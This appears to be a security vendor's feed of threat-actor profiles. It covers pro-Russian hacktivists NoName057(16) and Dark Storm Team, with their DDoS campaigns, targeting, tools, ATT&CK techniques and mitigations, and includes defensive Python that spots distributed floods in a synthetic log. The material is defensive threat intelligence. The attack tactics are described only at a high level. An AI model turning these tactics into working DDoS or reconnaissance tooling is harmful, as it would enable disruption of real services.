Dark Storm Team exists as an active and coordinated hacktivist threat, leveraging broad alliances and sustained disruption tactics to target critical sectors worldwide. Its methods and participation in multi-group campaigns require timely and high-quality intelligence. 

Fortunately, Cyble’s threat intelligence platform delivers this level of foresight, offering real-time awareness and AI-driven analysis that support faster and more informed defensive decisions. In an environment shaped by rapid escalation and unpredictable factors, timely intelligence is the most reliable path to proactive security. 

Start with a free External Threat Assessment to reveal the risks hidden across your attack surface. Follow it with a personalized Cyble demo to see how AI-native intelligence detects, predicts, and neutralizes threats like Dark Storm Team in real time. 

Recommendation and Mitigation Strategies 

  • Deploy DDoS protection and redundant infrastructure to maintain service availability. 

  • Keep public-facing systems and applications patched and secure. 

  • Harden endpoints to prevent crashes and resource exhaustion. 

  • Monitor threats using intelligence platforms like Cyble for early detection. 

  • Train staff to recognize phishing and social engineering attempts. 

  • Secure critical infrastructure, including transport and ICS systems. 

MITRE ATT&CK Techniques Associated with Dark Storm Team 

MITRE ATT&CK Techniques (Source: Cyble Vision) 

  • Exploit Public-Facing Application (T1190): Adversaries exploit weaknesses in internet‑facing systems, such as websites, databases, cloud platforms, or network devices, to gain initial access, often leveraging bugs, misconfigurations, or outdated components. Compromise may extend to underlying cloud or container environments and edge infrastructure. 

  • Network Denial of Service (T1498): Attackers overwhelm network bandwidth to disrupt access to websites, DNS, email, and other online services. These attacks may come from single or distributed sources, often using IP spoofing or botnets to increase volume and evade filtering. 

  • Endpoint Denial of Service (T1499): Adversaries exhaust system resources or cause crashes on specific hosts without saturating network capacity. They target operating systems, server software, and application layers, frequently using botnets or traffic manipulation techniques. 

  • Gather Victim Identity Information (T1589): Attackers collect user identities, credentials, and authentication details through phishing, system probing, or publicly available sources to support targeted attacks or enable unauthorized access. 

  • Gather Victim Host Information (T1592): Adversaries obtain details about system configurations, network setups, and host attributes through scanning, phishing, or embedded malicious content, supporting further reconnaissance and preparation for intrusion. 

The post Threat Actor Profile: Dark Storm Team appeared first on Cyble.

Threat Actor Profile: NoName057(16) https://cyble.com/threat-actor-profiles/noname05716/ Tue, 18 Nov 2025 12:56:24 +0000 https://cyble.com/?post_type=threat_actor&p=105441 NoName057(16)

NoName057(16), also referenced as 05716nnm, Nnm05716, NoName057, and NoName05716, is a pro-Russian hacktivist group that emerged in early 2022. The group quickly became known for coordinating large-scale Distributed Denial of Service (DDoS) operations against governments, critical infrastructure, and private-sector organizations in countries viewed as opposing Russian geopolitical interests. Its activity is ideologically motivated rather than financially driven, and its operations often coincide with political developments related to Russia’s war against Ukraine. 

Since its first observed campaigns, NoName057(16) has used Telegram as its primary communication channel, providing updates on targets, circulating propaganda, and mobilizing volunteers who participate in coordinated attacks. The group also relies on its custom DDoS toolkit, DDOSIA, which streamlines the execution of high-volume traffic floods. Through these combined methods, NoName057 has positioned itself as one of the more persistent hacktivist collectives operating within the wider pro-Russian ecosystem. 

By mid-2025, intelligence reporting suggested that some former members of the People's Cyber Army, an entity historically associated with APT44, had aligned themselves with NoName057(16). If accurate, this shift likely enhanced the group’s operational maturity, strengthening its ability to conduct attacks that extend beyond basic hacktivism. 

Geographic and Industry Targeting 

Cyble Vision Threat Library (Source: Cyble Vision)       

Although the group’s ideological focus remains centered on Ukraine, NoName057 campaigns have reached far beyond the region. Targets have been recorded across Europe, North America, and parts of Asia. Countries repeatedly affected include Canada, the Czech Republic, Germany, Denmark, Estonia, Spain, France, the United Kingdom, Israel, Italy, South Korea, Lithuania, Latvia, Moldova, Norway, Poland, Turkey, Taiwan, Ukraine, and the United States. 

Sector-specific targeting by NoName057 spans a wide variety of industries. The group has directed attention toward agriculture, banking and financial services, consumer goods, energy and utilities, government agencies, law enforcement, hospitality, manufacturing, telecommunications, retail, transportation, and logistics.  

This pattern aligns with the behavior of ideologically motivated actors seeking to create public disruption and generate media attention rather than stealing data or achieving persistence within affected networks. 

Tooling and Related Groups

Malware Families Used by NoName057 (Source: Cyble Vision)  

NoName057 campaigns frequently incorporate tools and infrastructure provided by the associated group known as Dosia. While Dosia is sometimes considered a separate entity, its capabilities are frequently leveraged by threat actors aligned with pro-Russian causes, including NoName057. Dosia’s activities center on social engineering and DDoS operations, and it has been linked to infrastructure initially tied to the obscure hosting provider Stark Industries Solutions. 

Dosia’s ongoing development of DDoS utilities, reported to be increasingly compatible with diverse processor architectures and operating systems, suggests an effort to make its tools more accessible to a distributed volunteer base. Threat actors using Dosia-linked resources often rely on deception tactics to trick users into exposing sensitive information or unknowingly assisting malicious operations.  

Tactics and Techniques 

NoName057 typically begins its operations by taking advantage of weaknesses in systems that are accessible online, using flaws or outdated components to gain a foothold and sometimes hiding its activity once inside.  

Their primary method of disruption involves overwhelming networks with excessive traffic to knock websites, email platforms, and other online services offline, often as a way to send a political message or support a broader narrative. They also carry out attacks that directly overload or destabilize individual devices, causing them to crash or become unresponsive without flooding the entire network.  

Before launching these actions, NoName057 gathers information about potential targets, such as user details or system characteristics, sometimes by probing online services or planting malicious content on compromised sites, allowing them to tailor and strengthen their attacks. 

Recent Disruption: Operation Eastwood 

Between 14 and 17 July 2025, Europol and Eurojust coordinated Operation Eastwood, a major effort to suppress the infrastructure supporting NoName057(16). Law enforcement agencies across more than a dozen countries dismantled over 100 servers linked to the group, disrupting command channels and taking core systems offline. Investigators issued seven arrest warrants and conducted numerous searches and interviews targeting suspected collaborators. 

Authorities also contacted more than 1,000 individuals believed to have supported the group’s campaigns, informing them of potential legal consequences. Prior investigations had shown that NoName057 frequently relied on crowdsourced participation, sometimes offering small cryptocurrency rewards to encourage involvement. 

Conclusion 

As of 2025, NoName057(16) continues to operate as a highly active pro-Russian hacktivist collective, targeting governments and organizations that oppose Russia’s strategic interests. Its volunteer-driven ecosystem, coordination with groups like Dosia, and continuous adaptation of attack techniques allow it to remain effective despite recent law-enforcement disruptions. 

 To counter fast-moving threats like this, Cyble’s External Threat Profile Report offers organizations a clear view of vulnerabilities, misconfigurations, data leaks, and dark-web exposure.  

Get a free External Threat Assessment to understand your exposure and take corrective action. Or schedule a personalized demo to see how Cyble can protect your organization against NoName057(16) and other threat actors today! 

Recommendation and Mitigation Strategies 

  • DDoS Protection: Deploy traffic filtering, rate limiting, and redundant infrastructure to withstand high-volume attacks. 

  • Secure Public-Facing Systems: Regularly patch web servers, databases, and network devices to prevent exploitation. 

  • Endpoint Hardening: Monitor system resources, apply updates, and use endpoint detection to prevent crashes or service disruptions. 

  • Staff Awareness: Train employees against social engineering and phishing campaigns commonly used by NoName057 and Dosia. 

  • Threat Intelligence & Monitoring: Use continuous monitoring and tools like Cyble’s External Threat Profile Report to detect vulnerabilities, exposed data, and suspicious activity. 
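
The Dark Storm Team and NoName057(16) profiles both describe floods sent from many sources so that they are harder to block, and both recommendation lists call for traffic filtering and rate limiting. The following added example, written for this page and not Cyble's code, shows why per-source rate limiting on its own is not enough: it runs a sliding-window per-IP limiter and an aggregate requests-per-second check over a constructed access log in Common Log Format. The IP addresses come from the documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), the timestamps and traffic shape are synthetic, and the thresholds are illustrative defaults rather than values from either profile.

```python
"""Per-source sliding-window rate limiting plus an aggregate requests-per-second
check, run over a constructed access log in Common Log Format. The per-IP limit
catches a single noisy source; only the aggregate check catches a flood spread
across many sources that each stay under the per-IP limit."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+')
CLF_TIME = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[Dict]:
    """Parse one CLF line into ip / epoch timestamp / request / status, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], CLF_TIME).timestamp()
    return {"ip": m["ip"], "ts": ts, "req": m["req"], "status": int(m["status"])}


class SlidingWindowLimiter:
    """Allow at most `limit` events per key inside any trailing window of `window_s` seconds."""

    def __init__(self, limit: int, window_s: float):
        self.limit, self.window = limit, window_s
        self.hits: Dict[str, deque] = defaultdict(deque)

    def allow(self, key: str, ts: float) -> bool:
        q = self.hits[key]
        while q and ts - q[0] >= self.window:   # drop hits that fell out of the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(ts)
        return True


def detect_floods(lines: List[str], per_ip_limit: int = 20, window_s: float = 10.0,
                  baseline_rps: int = 5, surge_factor: int = 5, min_sources: int = 10) -> Dict:
    """Return the sources the per-IP limiter blocked and the seconds (offsets from the first
    event) in which aggregate volume exceeded surge_factor x baseline across min_sources IPs."""
    events = sorted(filter(None, map(parse_line, lines)), key=lambda e: e["ts"])
    if not events:
        return {"blocked_sources": [], "distributed_flood_seconds": []}
    limiter = SlidingWindowLimiter(per_ip_limit, window_s)
    blocked, count, sources = set(), defaultdict(int), defaultdict(set)
    start = int(events[0]["ts"])
    for e in events:
        if not limiter.allow(e["ip"], e["ts"]):
            blocked.add(e["ip"])
        sec = int(e["ts"]) - start
        count[sec] += 1
        sources[sec].add(e["ip"])
    surge = [s for s in sorted(count)
             if count[s] >= baseline_rps * surge_factor and len(sources[s]) >= min_sources]
    return {"blocked_sources": sorted(blocked), "distributed_flood_seconds": surge}


# Constructed sample log: documentation IP ranges, synthetic traffic shape.
BASE = datetime(2025, 3, 1, 12, 0, 0, tzinfo=timezone.utc)


def clf_line(ip: str, offset_s: int, path: str) -> str:
    ts = (BASE + timedelta(seconds=offset_s)).strftime(CLF_TIME)
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512'


def build_sample_log() -> List[str]:
    lines = []
    for sec in range(30):                       # steady background: 3 clients, 1 req/s each
        for ip in ("192.0.2.10", "192.0.2.11", "192.0.2.12"):
            lines.append(clf_line(ip, sec, "/index.html"))
    lines += [clf_line("203.0.113.7", 12, "/search") for _ in range(50)]   # one noisy source
    for sec in (20, 21):                        # 60 sources, 2 req/s each: 120 rps aggregate
        for host in range(1, 61):
            lines += [clf_line(f"198.51.100.{host}", sec, "/api/status")] * 2
    return lines


if __name__ == "__main__":
    print(detect_floods(build_sample_log()))
```

On the sample log the limiter blocks only 203.0.113.7, the single source that sends 50 requests in one second. The 60 sources at seconds 20 and 21 each send four requests in total, well under the per-IP limit, so none of them is blocked; only the aggregate check, which compares volume to a baseline and requires many distinct sources, flags those two seconds as a distributed flood. Second 12 also exceeds the volume threshold but comes from four addresses, so it is reported as a single noisy client rather than a distributed event.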

MITRE ATT&CK Techniques Associated with NoName057(16) 

MITRE ATT&CK Techniques (Source: Cyble Vision) 

  • Exploit Public-Facing Application (T1190): Adversaries target internet-facing systems, including websites, databases, network devices, and cloud/container infrastructure, exploiting software bugs, misconfigurations, or outdated components to gain initial access. 

  • Network Denial of Service (T1498): Attackers overwhelm network bandwidth to disrupt websites, email, DNS, or web services, using single or distributed sources, often leveraging IP spoofing or botnets. 

  • Endpoint Denial of Service (T1499): Adversaries exhaust system resources or crash services on target devices without saturating the network, targeting OS, server apps, and application layers, sometimes using botnets or traffic manipulation. 

  • Gather Victim Identity Information (T1589): Attackers collect personal data, credentials, and user details via phishing, system probing, or publicly available sources to support further attacks. 

  • Gather Victim Host Information (T1592): Adversaries gather configuration and administrative details of target systems through scanning, phishing, or embedding malicious content, aiding in reconnaissance and operational setup. 

The post Threat Actor Profile: NoName057(16) appeared first on Cyble.
